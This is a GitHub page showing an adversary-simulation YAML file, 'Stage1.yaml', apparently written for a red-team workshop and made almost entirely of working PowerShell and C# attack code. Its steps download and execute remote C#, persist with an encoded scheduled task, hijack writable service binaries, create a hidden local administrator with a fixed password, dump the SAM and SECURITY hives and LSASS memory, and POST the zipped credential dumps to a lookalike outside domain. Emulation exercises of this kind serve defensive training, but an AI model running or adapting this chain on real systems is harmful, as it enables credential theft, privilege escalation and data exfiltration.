-
Notifications
You must be signed in to change notification settings - Fork 0
/
Stage1.yaml
207 lines (186 loc) · 8.88 KB
/
Stage1.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
attack_technique: Stage1
display_name: "Initial Compromise Example"
atomic_tests:
# T1053.005, T1119 (Scheduled Task for Escalation Discovery)
- name: T1053.005 - Scheduled Task and T1119 Automated Collection
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 00:01.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$psh = @'
$id = Get-Random
$code = (iwr -UseBasicParsing https://raw.githubusercontent.com/mobia-security-services/adversarysimulationworkshop/main/discovery.cs) -replace "class Program","class Runny$id" -replace "namespace SharpUp","namespace ShipOut"
$assemblies = ('System.Xml.Linq','System.Core','System.Data','System.Xml', 'System.Data.DataSetExtensions', 'Microsoft.CSharp', 'System.ServiceProcess', 'System.Management')
Add-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp -IgnoreWarnings
iex -Command "[ShipOut.Runny$id]::GetModifiableServices()"
'@
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psh)
$encodedCommand = [Convert]::ToBase64String($bytes)
"powershell -enc $encodedCommand | out-file $env:APPDATA\services.txt" | % { $_ | out-file $env:APPDATA\prayload.ps1 }
$A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Command $env:APPDATA\prayload.ps1"
$T = New-ScheduledTaskTrigger -Daily -At "00:01"
$P = New-ScheduledTaskPrincipal "$env:USERNAME"
$S = New-ScheduledTaskSettingsSet
$D = New-ScheduledTask -Action $A -Principal $P -Trigger $T -Settings $S
Register-ScheduledTask T1 -InputObject $D -Force
start-sleep 5
Start-ScheduledTask -TaskName T1
start-sleep 5
cleanup_command: |
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
- name: T1053.005 - Scheduled Task + T1574.010 Services File Permission Weakness + T1003.001 LSASS
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 00:01.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$f=(Get-Content $env:AppData\services.txt)
$targets = @()
(($f -match '^ (Name|PathName)') -replace ' Name',"`nName" -replace " PathName","PathName") -join "," | % {
if($_ -notmatch '^ '){
$_ -replace "`",`n","`"`n" -replace "^`n",'' -split "`n" | % {
$service = ("{{'{0}'}}" -f ("$_" -replace ' : ',"':'" -replace ' : ',"':'" -replace ',',"','" -replace '\\','\\'))
$targets += ($service |convertfrom-json)
}
}
}
if($targets.Count -gt 0){
$code = @"
using System;
using System.DirectoryServices;
using System.Diagnostics;
namespace HelloWorld
{
public class Program$id
{
public static void Main(){
DirectoryEntry hostMachineDirectory = new DirectoryEntry("WinNT://localhost");
DirectoryEntries entries = hostMachineDirectory.Children;
bool userExists = false;
foreach (DirectoryEntry each in entries)
{
userExists = each.Name.Equals("TestUser1",StringComparison.CurrentCultureIgnoreCase);
if (userExists)
break;
}
if (false == userExists)
{
DirectoryEntry AD = new DirectoryEntry("WinNT://" +
Environment.MachineName + ",computer");
DirectoryEntry NewUser = AD.Children.Add("TestUser1", "user");
NewUser.Invoke("SetPassword", new object[] {"#12345Abc"});
NewUser.Invoke("Put", new object[] {"Description", "Test User from .NET"});
NewUser.CommitChanges();
DirectoryEntry grp;
grp = AD.Children.Find("Administrators", "group");
if (grp != null) {grp.Invoke("Add", new object[] {NewUser.Path.ToString()});}
Console.WriteLine("Account Created Successfully");
}
var sam = new Process {
StartInfo = new ProcessStartInfo {
FileName = @"c:\windows\system32\reg.exe",
Arguments = @"save hklm\sam c:\temp\sam.save"
}
};
sam.Start();
sam.WaitForExit();
var security = new Process {
StartInfo = new ProcessStartInfo {
FileName = @"c:\windows\system32\reg.exe",
Arguments = @"save hklm\security c:\temp\security.save"
}
};
security.Start();
security.WaitForExit();
var system = new Process {
StartInfo = new ProcessStartInfo {
FileName = @"c:\windows\system32\reg.exe",
Arguments = @"save hklm\system c:\temp\system.save"
}
};
system.Start();
system.WaitForExit();
Process[] processlist = Process.GetProcessesByName("lsass");
foreach (Process p in processlist)
{
var strPID = Convert.ToString(p.Id);
var process = new Process {
StartInfo = new ProcessStartInfo {
FileName = @"c:\windows\system32\rundll32.exe",
Arguments = String.Format(@"C:\windows\System32\comsvcs.dll, MiniDump {0} C:\Temp\dumper.dmp full",strPID)
}
};
process.Start();
process.WaitForExit();
var copy = new Process {
StartInfo = new ProcessStartInfo {
FileName = @"c:\windows\system32\cmd.exe",
Arguments = String.Format("/k \"move /Y C:\\Temp\\dumper.dmp C:\\temp\\temp.dmp\"")
}
};
copy.Start();
copy.WaitForExit();
break;
}
}
}
}
"@ | out-file C:\temp\prayload.cs
$name = $targets[0].Name.Trim()
$path = ($targets[0].PathName -replace '"','')
C:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:$path c:\temp\prayload.cs
Stop-Service $name -ErrorAction SilentlyContinue
Start-Service $name -ErrorAction SilentlyContinue
}
# T1560 Archive Collected
- name: Compress Data for Tranport
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
description: |
Compress data using powershell as newly created admin user
supported_platforms:
- windows
dependencies:
executor:
name: powershell
elevation_required: false
command: |
$Username = 'testuser1'
$Password = '#12345Abc'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
invoke-command -ComputerName $env:COMPUTERNAME -Credential $Cred -SessionOption (New-PSSessionOption -SkipRevocationCheck) -ScriptBlock {
$compress = @{
Path = "C:\Temp\temp.dmp","C:\temp\*.save"
CompressionLevel = "Fastest"
DestinationPath = "C:\Temp\${env:COMPUTERNAME}_exfil.zip"
}
Compress-Archive @compress -Force
}
# T1567 Exfiltration Over Web Service (to view results https://windowsdefenderpro.net/{reqid from c:\temp\reqid.txt})
- name: Exflitration Over Web Service
auto_generated_guid: d1334303-59cb-4a03-8213-b3e24d02c198
description: |
Post file using powershell
supported_platforms:
- windows
dependencies:
executor:
name: powershell
elevation_required: false
command: |
$uri = "https://windowsdefenderpro.net/upload/"
$base64Image = [convert]::ToBase64String(([System.IO.File]::ReadAllBytes("C:\Temp\${env:COMPUTERNAME}_exfil.zip")))
$result = (Invoke-WebRequest -uri $uri -Method Post -Body $base64Image -ContentType "application/base64" -UseBasicParsing).Content | convertfrom-json
$result.reqid | out-file -FilePath C:\temp\reqid.txt
# END STAGE 1